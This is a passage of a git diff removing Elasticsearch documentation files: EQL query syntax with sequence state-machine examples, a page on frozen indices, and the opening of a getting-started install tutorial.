indexed value of the -<>. You can set the event category -field using the `event_category_field` parameter of the EQL search API. - -[discrete] -[[eql-syntax-match-any-event-category]] -=== Match any event category - -To match events of any category, use the `any` keyword. You can also use the -`any` keyword to search for documents without a event category field. - -For example, the following EQL query matches any documents with a -`network.protocol` field value of `http`: - -[source,eql] ----- -any where network.protocol == "http" ----- - -[discrete] -[[eql-syntax-escape-an-event-category]] -=== Escape an event category - -Use enclosing double quotes (`"`) or three enclosing double quotes (`"""`) to -escape event categories that: - -* Contain a special character, such as a hyphen (`-`) or dot (`.`) -* Contain a space -* Start with a numeral - -[source,eql] ----- -".my.event.category" -"my-event-category" -"my event category" -"6eventcategory" - -""".my.event.category""" -"""my-event-category""" -"""my event category""" -"""6eventcategory""" ----- - -[discrete] -[[eql-syntax-escape-a-field-name]] -=== Escape a field name - -Use enclosing enclosing backticks (+++`+++) to escape field names that: - -* Contain a hyphen (`-`) -* Contain a space -* Start with a numeral - -[source,eql] ----- -`my-field` -`my field` -`6myfield` ----- - -Use double backticks (+++``+++) to escape any backticks (+++`+++) in the field -name. - -[source,eql] ----- -my`field -> `my``field` ----- - -[discrete] -[[eql-syntax-conditions]] -=== Conditions - -A condition consists of one or more criteria an event must match. -You can specify and combine these criteria using the following operators. Most -EQL operators are case-sensitive by default. - -[discrete] -[[eql-syntax-comparison-operators]] -=== Comparison operators - -[source,eql] ----- -< <= == : != >= > ----- - -`<` (less than):: -Returns `true` if the value to the left of the operator is less than the value -to the right. Otherwise returns `false`. - -`<=` (less than or equal) :: -Returns `true` if the value to the left of the operator is less than or equal to -the value to the right. Otherwise returns `false`. - -`==` (equal, case-sensitive):: -Returns `true` if the values to the left and right of the operator are equal. -Otherwise returns `false`. For strings, matching is case-sensitive. - -`:` (equal, case-insensitive):: -Returns `true` if strings to the left and right of the operator are equal. -Otherwise returns `false`. Matching is case-insensitive and can only be used to -compare strings. - -[IMPORTANT] -==== -Avoid using the `==` or `:` operators to perform exact matching on -<> field values. - -By default, {es} changes the values of `text` fields as part of <>. This can make finding exact matches for `text` field values -difficult. - -To search `text` fields, consider using a <> that contains a <> query. -==== - -`!=` (not equal, case-sensitive):: -Returns `true` if the values to the left and right of the operator are not -equal. Otherwise returns `false`. For strings, matching is case-sensitive. - -`>=` (greater than or equal) :: -Returns `true` if the value to the left of the operator is greater than or equal -to the value to the right. Otherwise returns `false`. When comparing strings, -the operator uses a case-sensitive lexicographic order. - -`>` (greater than):: -Returns `true` if the value to the left of the operator is greater than the -value to the right. Otherwise returns `false`. When comparing strings, -the operator uses a case-sensitive lexicographic order. - -NOTE: `=` is not supported as an equal operator. Use `==` or `:` instead. - -You cannot chain comparison operators. Instead, use a -<> between comparisons. For -example, `foo < bar <= baz` is not supported. However, you can rewrite the -expression as `foo < bar and bar <= baz`, which is supported. - -You also cannot use comparison operators to compare a field to another field. -This applies even if the fields are changed using a <>. - -*Example* + -The following EQL query compares the `process.parent_name` field -value to a static value, `foo`. This comparison is supported. - -However, the query also compares the `process.parent.name` field value to the -`process.name` field. This comparison is not supported and will return an -error for the entire query. - -[source,eql] ----- -process where process.parent.name == "foo" and process.parent.name == process.name ----- - -Instead, you can rewrite the query to compare both the `process.parent.name` -and `process.name` fields to static values. - -[source,eql] ----- -process where process.parent.name == "foo" and process.name == "foo" ----- - -[discrete] -[[eql-syntax-logical-operators]] -=== Logical operators - -[source,eql] ----- -and or not ----- - -`and`:: -Returns `true` only if the condition to the left and right _both_ return `true`. -Otherwise returns `false`. - -`or`:: -Returns `true` if one of the conditions to the left or right `true`. -Otherwise returns `false`. - -`not`:: -Returns `true` if the condition to the right is `false`. - -[discrete] -[[eql-syntax-lookup-operators]] -=== Lookup operators - -[source,eql] ----- -user.name in ("Administrator", "SYSTEM", "NETWORK SERVICE") -user.name not in ("Administrator", "SYSTEM", "NETWORK SERVICE") ----- - -`in` (case-sensitive):: -Returns `true` if the value is contained in the provided list. For strings, -matching is case-sensitive. - -`not in` (case-sensitive):: -Returns `true` if the value is not contained in the provided list. For strings, -matching is case-sensitive. - -[discrete] -[[eql-syntax-math-operators]] -=== Math operators - -[source,eql] ----- -+ - * / % ----- - -`+` (add):: -Adds the values to the left and right of the operator. - -`-` (subtract):: -Subtracts the value to the right of the operator from the value to the left. - -`*` (multiply):: -Multiplies the values to the left and right of the operator. - -`/` (divide):: -Divides the value to the left of the operator by the value to the right. -+ -[[eql-divide-operator-float-rounding]] -[WARNING] -==== -If both the dividend and divisor are integers, the divide (`\`) operation -_rounds down_ any returned floating point numbers to the nearest integer. To -avoid rounding, convert either the dividend or divisor to a float. - -*Example* + -The `process.args_count` field is a <> integer field containing a -count of process arguments. - -A user might expect the following EQL query to only match events with a -`process.args_count` value of `4`. - -[source,eql] ----- -process where ( 4 / process.args_count ) == 1 ----- - -However, the EQL query matches events with a `process.args_count` value of `3` -or `4`. - -For events with a `process.args_count` value of `3`, the divide operation -returns a float of `1.333...`, which is rounded down to `1`. - -To match only events with a `process.args_count` value of `4`, convert -either the dividend or divisor to a float. - -The following EQL query changes the integer `4` to the equivalent float `4.0`. - -[source,eql] ----- -process where ( 4.0 / process.args_count ) == 1 ----- -==== - -`%` (modulo):: -Divides the value to the left of the operator by the value to the right. Returns only the remainder. - -[discrete] -[[eql-syntax-match-any-condition]] -=== Match any condition - -To match events solely on event category, use the `where true` condition. - -For example, the following EQL query matches any `file` events: - -[source,eql] ----- -file where true ----- - -To match any event, you can combine the `any` keyword with the `where true` -condition: - -[source,eql] ----- -any where true ----- - -[discrete] -[[eql-syntax-strings]] -=== Strings - -Strings are enclosed in double quotes (`"`). - -[source,eql] ----- -"hello world" ----- - -Strings enclosed in single quotes (`'`) are not supported. - -[discrete] -[[eql-syntax-escape-characters]] -=== Escape characters in a string - -When used within a string, special characters, such as a carriage return or -double quote (`"`), must be escaped with a preceding backslash (`\`). - -[source,eql] ----- -"example \r of \" escaped \n characters" ----- - -[options="header"] -|==== -| Escape sequence | Literal character -|`\n` | A newline (linefeed) character -|`\r` | A carriage return character -|`\t` | A tab character -|`\\` | A backslash (`\`) character -|`\"` | A double quote (`"`) character -|==== - -IMPORTANT: The single quote (`'`) character is reserved for future use. You -cannot use an escaped single quote (`\'`) for literal strings. Use an escaped -double quote (`\"`) instead. - -[discrete] -[[eql-syntax-raw-strings]] -=== Raw strings - -Raw strings treat special characters, such as backslashes (`\`), as literal -characters. Raw strings are enclosed in three double quotes (`"""`). - -[source,eql] ----- -"""Raw string with a literal double quote " and blackslash \ included""" ----- - -A raw string cannot contain three consecutive double quotes (`"""`). Instead, -use a regular string with the `\"` escape sequence. - -[source,eql] ----- -"String containing \"\"\" three double quotes" ----- - -[discrete] -[[eql-sequences]] -=== Sequences - -You can use EQL sequences to describe and match an ordered series of events. -Each item in a sequence is an event category and event condition, -surrounded by square brackets (`[ ]`). Events are listed in ascending -chronological order, with the most recent event listed last. - -[source,eql] ----- -sequence - [ event_category_1 where condition_1 ] - [ event_category_2 where condition_2 ] - ... ----- - -*Example* + -The following EQL sequence query matches this series of ordered events: - -. Start with an event with: -+ --- -* An event category of `file` -* A `file.extension` of `exe` --- -. Followed by an event with an event category of `process` - -[source,eql] ----- -sequence - [ file where file.extension == "exe" ] - [ process where true ] ----- - -[discrete] -[[eql-with-maxspan-keywords]] -=== `with maxspan` keywords - -You can use the `with maxspan` keywords to constrain a sequence to a specified -timespan. All events in a matching sequence must occur within this duration, -starting at the first event's timestamp. - -The `maxspan` keyword accepts <> arguments. - -[source,eql] ----- -sequence with maxspan=30s - [ event_category_1 where condition_1 ] by field_baz - [ event_category_2 where condition_2 ] by field_bar - ... ----- - -*Example* + -The following sequence query uses a `maxspan` value of `15m` (15 minutes). -Events in a matching sequence must occur within 15 minutes of the first event's -timestamp. - -[source,eql] ----- -sequence with maxspan=15m - [ file where file.extension == "exe" ] - [ process where true ] ----- - -[discrete] -[[eql-by-keyword]] -=== `by` keyword - -You can use the `by` keyword with sequences to only match events that share the -same field values. If a field value should be shared across all events, you -can use `sequence by`. - -[source,eql] ----- -sequence by field_foo - [ event_category_1 where condition_1 ] by field_baz - [ event_category_2 where condition_2 ] by field_bar - ... ----- - -*Example* + -The following sequence query uses the `by` keyword to constrain matching events -to: - -* Events with the same `user.name` value -* `file` events with a `file.path` value equal to the following `process` - event's `process.path` value. - -[source,eql] ----- -sequence - [ file where file.extension == "exe" ] by user.name, file.path - [ process where true ] by user.name, process.path ----- - -Because the `user.name` field is shared across all events in the sequence, it -can be included using `sequence by`. The following sequence is equivalent to the -prior one. - -[source,eql] ----- -sequence by user.name - [ file where file.extension == "exe" ] by file.path - [ process where true ] by process.path ----- - -You can combine the `sequence by` and `with maxspan` keywords to constrain a -sequence by both field values and a timespan. - -[source,eql] ----- -sequence by field_foo with maxspan=30s - [ event_category_1 where condition_1 ] by field_baz - [ event_category_2 where condition_2 ] by field_bar - ... ----- - -*Example* + -The following sequence query uses the `sequence by` keyword and `with maxspan` -keywords to match only a sequence of events that: - -* Share the same `user.name` field values -* Occur within `15m` (15 minutes) of the first matching event - -[source,eql] ----- -sequence by user.name with maxspan=15m - [ file where file.extension == "exe" ] by file.path - [ process where true ] by process.path ----- - -[discrete] -[[eql-until-keyword]] -=== `until` keyword - -You can use the `until` keyword to specify an expiration event for a sequence. -If this expiration event occurs _between_ matching events in a sequence, the -sequence expires and is not considered a match. If the expiration event occurs -_after_ matching events in a sequence, the sequence is still considered a -match. The expiration event is not included in the results. - -[source,eql] ----- -sequence - [ event_category_1 where condition_1 ] - [ event_category_2 where condition_2 ] - ... -until [ event_category_3 where condition_3 ] ----- - -*Example* + -A dataset contains the following event sequences, grouped by shared IDs: - -[source,txt] ----- -A, B -A, B, C -A, C, B ----- - -The following EQL query searches the dataset for sequences containing -event `A` followed by event `B`. Event `C` is used as an expiration event. - -[source,eql] ----- -sequence by ID - A - B -until C ----- - -The query matches sequences `A, B` and `A, B, C` but not `A, C, B`. - -[TIP] -==== -The `until` keyword can be useful when searching for process sequences in -Windows event logs. - -In Windows, a process ID (PID) is unique only while a process is running. After -a process terminates, its PID can be reused. - -You can search for a sequence of events with the same PID value using the `by` -and `sequence by` keywords. - -*Example* + -The following EQL query uses the `sequence by` keyword to match a -sequence of events that share the same `process.pid` value. - -[source,eql] ----- -sequence by process.pid - [ process where event.type == "start" and process.name == "cmd.exe" ] - [ process where file.extension == "exe" ] ----- - -However, due to PID reuse, this can result in a matching sequence that -contains events across unrelated processes. To prevent false positives, you can -use the `until` keyword to end matching sequences before a process termination -event. - -The following EQL query uses the `until` keyword to end sequences before -`process` events with an `event.type` of `stop`. These events indicate a process -has been terminated. - -[source,eql] ----- -sequence by process.pid - [ process where event.type == "start" and process.name == "cmd.exe" ] - [ process where file.extension == "exe" ] -until [ process where event.type == "stop" ] ----- -==== - -[discrete] -[[eql-functions]] -=== Functions - -You can use EQL functions to convert data types, perform math, manipulate -strings, and more. Most functions are case-sensitive by default. - -For a list of supported functions, see <>. - -[TIP] -==== -Using functions in EQL queries can result in slower search speeds. If you -often use functions to transform indexed data, you can speed up search by making -these changes during indexing instead. However, that often means slower index -speeds. - -*Example* + -An index contains the `file.path` field. `file.path` contains the full path to a -file, including the file extension. - -When running EQL searches, users often use the `endsWith` function with the -`file.path` field to match file extensions: - -[source,eql] ----- -file where endsWith(file.path,".exe") or endsWith(file.path,".dll") ----- - -While this works, it can be repetitive to write and can slow search speeds. To -speed up search, you can do the following instead: - -. <>, `file.extension`, to the index. The - `file.extension` field will contain only the file extension from the - `file.path` field. -. Use an <> containing the <> - processor or another preprocessor tool to extract the file extension from the - `file.path` field before indexing. -. Index the extracted file extension to the `file.extension` field. - -These changes may slow indexing but allow for faster searches. Users -can use the `file.extension` field instead of multiple `endsWith` function -calls: - -[source,eql] ----- -file where file.extension in ("exe", "dll") ----- - -We recommend testing and benchmarking any indexing changes before deploying them -in production. See <> and <>. -==== - -[discrete] -[[eql-pipes]] -=== Pipes - -EQL pipes filter, aggregate, and post-process events returned by -an EQL query. You can use pipes to narrow down EQL query results or make them -more specific. - -Pipes are delimited using the pipe (`|`) character. - -[source,eql] ----- -event_category where condition | pipe ----- - -*Example* + -The following EQL query uses the `tail` pipe to return only the 10 most recent -events matching the query. - -[source,eql] ----- -authentication where agent.id == 4624 -| tail 10 ----- - -You can pass the output of a pipe to another pipe. This lets you use multiple -pipes with a single query. - -For a list of supported pipes, see <>. - -[discrete] -[[eql-syntax-limitations]] -=== Limitations - -EQL does not support the following features and syntax. - -[discrete] -[[eql-compare-fields]] -==== Comparing fields - -You cannot use EQL comparison operators to compare a field to -another field. This applies even if the fields are changed using a -<>. - -[discrete] -[[eql-array-fields]] -==== Array field values are not supported - -EQL does not support <> field values, also known as -multi-value fields. EQL searches on array field values may return inconsistent -results. - -[discrete] -[[eql-nested-fields]] -==== EQL search on nested fields - -You cannot use EQL to search the values of a <> field or the -sub-fields of a `nested` field. However, data streams and indices containing -`nested` field mappings are otherwise supported. - -[discrete] -[[eql-unsupported-syntax]] -==== Differences from Endgame EQL syntax - -{es} EQL differs from the {eql-ref}/index.html[Elastic Endgame EQL syntax] as -follows: - -* Most operators and functions in {es} EQL are case-sensitive. For -case-insensitive equality comparisons, use the `:` operator. - -* Comparisons using the `==` and `!=` operators do not expand wildcard -characters. For example, `process_name == "cmd*.exe"` interprets `*` as a -literal asterisk, not a wildcard. For case-sensitive wildcard matching, use the -<> function. - -* `=` cannot be substituted for the `==` operator. - -* Strings enclosed in single quotes (`'`) are not supported. Enclose strings in -double quotes (`"`) instead. - -* `?"` and `?'` do not indicate raw strings. Enclose raw strings in -three double quotes (`"""`) instead. - -* {es} EQL does not support: - -** Array functions: -*** {eql-ref}/functions.html#arrayContains[`arrayContains`] -*** {eql-ref}/functions.html#arrayCount[`arrayCount`] -*** {eql-ref}/functions.html#arraySearch[`arraySearch`] - -** The {eql-ref}//functions.html#match[`match`] function - -** {eql-ref}/joins.html[Joins] - -** {eql-ref}/basic-syntax.html#event-relationships[Lineage-related keywords]: -*** `child of` -*** `descendant of` -*** `event of` - -** The following {eql-ref}/pipes.html[pipes]: -*** {eql-ref}/pipes.html#count[`count`] -*** {eql-ref}/pipes.html#filter[`filter`] -*** {eql-ref}/pipes.html#sort[`sort`] -*** {eql-ref}/pipes.html#unique[`unique`] -*** {eql-ref}/pipes.html#unique-count[`unique_count`] - -[discrete] -[[eql-how-sequence-queries-handle-matches]] -==== How sequence queries handle matches - -<> don't find all potential matches for a -sequence. This approach would be too slow and costly for large event data sets. -Instead, a sequence query handles pending sequence matches as a -{wikipedia}/Finite-state_machine[state machine]: - -* Each event item in the sequence query is a state in the machine. -* Only one pending sequence can be in each state at a time. -* If two pending sequences are in the same state at the same time, the most -recent sequence overwrites the older one. -* If the query includes <>, the query uses a -separate state machine for each unique `by` field value. - -.*Example* -[%collapsible] -==== -A data set contains the following `process` events in ascending chronological -order: - -[source,js] ----- -{ "index" : { "_id": "1" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "2" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "3" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "4" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "5" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "6" } } -{ "user": { "name": "elkbee" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "7" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -{ "index" : { "_id": "8" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -{ "index" : { "_id": "9" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} -{ "index" : { "_id": "10" } } -{ "user": { "name": "elkbee" }, "process": { "name": "cat" }, ...} -{ "index" : { "_id": "11" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} ----- -// NOTCONSOLE - -An EQL sequence query searches the data set: - -[source,eql] ----- -sequence by user.name - [process where process.name == "attrib"] - [process where process.name == "bash"] - [process where process.name == "cat"] ----- - -The query's event items correspond to the following states: - -* State A: `[process where process.name == "attrib"]` -* State B: `[process where process.name == "bash"]` -* Complete: `[process where process.name == "cat"]` - -image::images/eql/sequence-state-machine.svg[align="center"] - -To find matching sequences, the query uses separate state machines for each -unique `user.name` value. Based on the data set, you can expect two state -machines: one for the `root` user and one for `elkbee`. - -image::images/eql/separate-state-machines.svg[align="center"] - -Pending sequence matches move through each machine's states as follows: - -[source,txt] ----- -{ "index" : { "_id": "1" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -// Creates sequence [1] in state A for the "root" user. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [1] | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "2" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -// Creates sequence [2] in state A for "root", overwriting sequence [1]. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [2] | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "3" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -// Nothing happens. The "elkbee" user has no pending sequence to move -// from state A to state B. -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "4" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -// Sequence [2] moves out of state A for "root". -// State B for "root" now contains [2, 4]. -// State A for "root" is empty. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ --> +-----------+ +------------+ | -// | | | | [2, 4] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "5" } } -{ "user": { "name": "root" }, "process": { "name": "bash" }, ...} -// Nothing happens. State A is empty for "root". -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | | | [2, 4] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "6" } } -{ "user": { "name": "elkbee" }, "process": { "name": "attrib" }, ...} -// Creates sequence [6] in state A for "elkbee". -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [6] | | | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "7" } } -{ "user": { "name": "root" }, "process": { "name": "attrib" }, ...} -// Creates sequence [7] in state A for "root". -// Sequence [2, 4] remains in state B for "root". -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [7] | | [2, 4] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "8" } } -{ "user": { "name": "elkbee" }, "process": { "name": "bash" }, ...} -// Sequence [6, 8] moves to state B for "elkbee". -// State A for "elkbee" is now empty. -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ --> +-----------+ +------------+ | -// | | | | [6, 8] | | | | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "9" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} -// Sequence [2, 4, 9] is complete for "root". -// State B for "root" is now empty. -// Sequence [7] remains in state A. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ --> +------------+ | -// | | [7] | | | | [2, 4, 9] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "10" } } -{ "user": { "name": "elkbee" }, "process": { "name": "cat" }, ...} -// Sequence [6, 8, 10] is complete for "elkbee". -// State A and B for "elkbee" are now empty. -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ --> +------------+ | -// | | | | | | [6, 8, 10] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ - -{ "index" : { "_id": "11" } } -{ "user": { "name": "root" }, "process": { "name": "cat" }, ...} -// Nothing happens. -// The machines for "root" and "elkbee" remain the same. -// -// +------------------------"root"------------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | [7] | | | | [2, 4, 9] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ -// -// +-----------------------"elkbee"-----------------------+ -// | +-----------+ +-----------+ +------------+ | -// | | State A | | State B | | Complete | | -// | +-----------+ +-----------+ +------------+ | -// | | | | | | [6, 8, 10] | -// | +-----------+ +-----------+ +------------+ | -// +------------------------------------------------------+ ----- - -==== diff --git a/docs/reference/frozen-indices.asciidoc b/docs/reference/frozen-indices.asciidoc deleted file mode 100644 index 3922fc18dff..00000000000 --- a/docs/reference/frozen-indices.asciidoc +++ /dev/null @@ -1,110 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[frozen-indices]] -= Frozen indices - -[partintro] --- -{es} indices keep some data structures in memory to allow you to search them -efficiently and to index into them. If you have a lot of indices then the -memory required for these data structures can add up to a significant amount. -For indices that are searched frequently it is better to keep these structures -in memory because it takes time to rebuild them. However, you might access some -of your indices so rarely that you would prefer to release the corresponding -memory and rebuild these data structures on each search. - -For example, if you are using time-based indices to store log messages or time -series data then it is likely that older indices are searched much less often -than the more recent ones. Older indices also receive no indexing requests. -Furthermore, it is usually the case that searches of older indices are for -performing longer-term analyses for which a slower response is acceptable. - -If you have such indices then they are good candidates for becoming _frozen -indices_. {es} builds the transient data structures of each shard of a frozen -index each time that shard is searched, and discards these data structures as -soon as the search is complete. Because {es} does not maintain these transient -data structures in memory, frozen indices consume much less heap than normal -indices. This allows for a much higher disk-to-heap ratio than would otherwise -be possible. - -You can freeze the index using the <>. - -Searches performed on frozen indices use the small, dedicated, -<> to control the number of -concurrent searches that hit frozen shards on each node. This limits the amount -of extra memory required for the transient data structures corresponding to -frozen shards, which consequently protects nodes against excessive memory -consumption. - -Frozen indices are read-only: you cannot index into them. - -Searches on frozen indices are expected to execute slowly. Frozen indices are -not intended for high search load. It is possible that a search of a frozen -index may take seconds or minutes to complete, even if the same searches -completed in milliseconds when the indices were not frozen. - -To make a frozen index writable again, use the <>. - --- - -[role="xpack"] -[testenv="basic"] -[[best_practices]] -== Best practices - -Since frozen indices provide a much higher disk to heap ratio at the expense of search latency, it is advisable to allocate frozen indices to -dedicated nodes to prevent searches on frozen indices influencing traffic on low latency nodes. There is significant overhead in loading -data structures on demand which can cause page faults and garbage collections, which further slow down query execution. - -Since indices that are eligible for freezing are unlikely to change in the future, disk space can be optimized as described in <>. - -It's highly recommended to <> your indices prior to freezing to ensure that each shard has only a single -segment on disk. This not only provides much better compression but also simplifies the data structures needed to service aggregation -or sorted search requests. - -[source,console] --------------------------------------------------- -POST /my-index-000001/_forcemerge?max_num_segments=1 --------------------------------------------------- -// TEST[setup:my_index] - -[role="xpack"] -[testenv="basic"] -[[searching_a_frozen_index]] -== Searching a frozen index - -Frozen indices are throttled in order to limit memory consumptions per node. The number of concurrently loaded frozen indices per node is -limited by the number of threads in the <> threadpool, which is `1` by default. -Search requests will not be executed against frozen indices by default, even if a frozen index is named explicitly. This is -to prevent accidental slowdowns by targeting a frozen index by mistake. To include frozen indices a search request must be executed with -the query parameter `ignore_throttled=false`. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_search?q=user.id:kimchy&ignore_throttled=false --------------------------------------------------- -// TEST[setup:my_index] - -[role="xpack"] -[testenv="basic"] -[[monitoring_frozen_indices]] -== Monitoring frozen indices - -Frozen indices are ordinary indices that use search throttling and a memory efficient shard implementation. For API's like the -<> frozen indices may identified by an index's `search.throttled` property (`sth`). - -[source,console] --------------------------------------------------- -GET /_cat/indices/my-index-000001?v=true&h=i,sth --------------------------------------------------- -// TEST[s/^/PUT my-index-000001\nPOST my-index-000001\/_freeze\n/] - -The response looks like: - -[source,txt] --------------------------------------------------- -i sth -my-index-000001 true --------------------------------------------------- -// TESTRESPONSE[non_json] - diff --git a/docs/reference/getting-started.asciidoc b/docs/reference/getting-started.asciidoc deleted file mode 100755 index 004e6e70f8e..00000000000 --- a/docs/reference/getting-started.asciidoc +++ /dev/null @@ -1,745 +0,0 @@ -[[getting-started]] -= Getting started with {es} - -[partintro] --- -Ready to take {es} for a test drive and see for yourself how you can use the -REST APIs to store, search, and analyze data? - -Step through this getting started tutorial to: - -. Get an {es} cluster up and running -. Index some sample documents -. Search for documents using the {es} query language -. Analyze the results using bucket and metrics aggregations - - -Need more context? - -Check out the <> to learn the lingo and understand the basics of -how {es} works. If you're already familiar with {es} and want to see how it works -with the rest of the stack, you might want to jump to the -{stack-gs}/get-started-elastic-stack.html[Elastic Stack -Tutorial] to see how to set up a system monitoring solution with {es}, {kib}, -{beats}, and {ls}. - -TIP: The fastest way to get started with {es} is to -{ess-trial}[start a free 14-day -trial of {ess}] in the cloud. --- - -[[getting-started-install]] -== Get {es} up and running - -To take {es} for a test drive, you can create a -{ess-trial}[hosted deployment] on -the {ess} or set up a multi-node {es} cluster on your own -Linux, macOS, or Windows machine. - -[discrete] -[[run-elasticsearch-hosted]] -=== Run {es} on Elastic Cloud - -When you create a deployment on the {es} Service, the service provisions -a three-node {es} cluster along with Kibana and APM. - -To create a deployment: - -. Sign up for a {ess-trial}[free trial] -and verify your email address. -. Set a password for your account. -. Click **Create Deployment**. - -Once you've created a deployment, you're ready to <>. - -[discrete] -[[run-elasticsearch-local]] -=== Run {es} locally on Linux, macOS, or Windows - -When you create a deployment on the {ess}, a master node and -two data nodes are provisioned automatically. By installing from the tar or zip -archive, you can start multiple instances of {es} locally to see how a multi-node -cluster behaves. - -To run a three-node {es} cluster locally: - -. Download the {es} archive for your OS: -+ -Linux: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-linux-x86_64.tar.gz[elasticsearch-{version}-linux-x86_64.tar.gz] -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-linux-x86_64.tar.gz --------------------------------------------------- -// NOTCONSOLE -+ -macOS: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-darwin-x86_64.tar.gz[elasticsearch-{version}-darwin-x86_64.tar.gz] -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -curl -L -O https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-darwin-x86_64.tar.gz --------------------------------------------------- -// NOTCONSOLE -+ -Windows: -https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-{version}-windows-x86_64.zip[elasticsearch-{version}-windows-x86_64.zip] - -. Extract the archive: -+ -Linux: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -tar -xvf elasticsearch-{version}-linux-x86_64.tar.gz --------------------------------------------------- -+ -macOS: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -tar -xvf elasticsearch-{version}-darwin-x86_64.tar.gz --------------------------------------------------- -+ -Windows PowerShell: -+ -["source","powershell",subs="attributes,callouts"] --------------------------------------------------- -Expand-Archive elasticsearch-{version}-windows-x86_64.zip --------------------------------------------------- - -. Start {es} from the `bin` directory: -+ -Linux and macOS: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -cd elasticsearch-{version}/bin -./elasticsearch --------------------------------------------------- -+ -Windows: -+ -["source","powershell",subs="attributes,callouts"] --------------------------------------------------- -cd elasticsearch-{version}\bin -.\elasticsearch.bat --------------------------------------------------- -+ -You now have a single-node {es} cluster up and running! - -. Start two more instances of {es} so you can see how a typical multi-node -cluster behaves. You need to specify unique data and log paths -for each node. -+ -Linux and macOS: -+ -["source","sh",subs="attributes,callouts"] --------------------------------------------------- -./elasticsearch -Epath.data=data2 -Epath.logs=log2 -./elasticsearch -Epath.data=data3 -Epath.logs=log3 --------------------------------------------------- -+ -Windows: -+ -["source","powershell",subs="attributes,callouts"] --------------------------------------------------- -.\elasticsearch.bat -E path.data=data2 -E path.logs=log2 -.\elasticsearch.bat -E path.data=data3 -E path.logs=log3 --------------------------------------------------- -+ -The additional nodes are assigned unique IDs. Because you're running all three -nodes locally, they automatically join the cluster with the first node. - -. Use the cat health API to verify that your three-node cluster is up running. -The cat APIs return information about your cluster and indices in a -format that's easier to read than raw JSON. -+ -You can interact directly with your cluster by submitting HTTP requests to -the {es} REST API. If you have Kibana installed and running, you can also -open Kibana and submit requests through the Dev Console. -+ -TIP: You'll want to check out the -https://www.elastic.co/guide/en/elasticsearch/client/index.html[{es} language -clients] when you're ready to start using {es} in your own applications. -+ -[source,console] --------------------------------------------------- -GET /_cat/health?v=true --------------------------------------------------- -+ -The response should indicate that the status of the `elasticsearch` cluster -is `green` and it has three nodes: -+ -[source,txt] --------------------------------------------------- -epoch timestamp 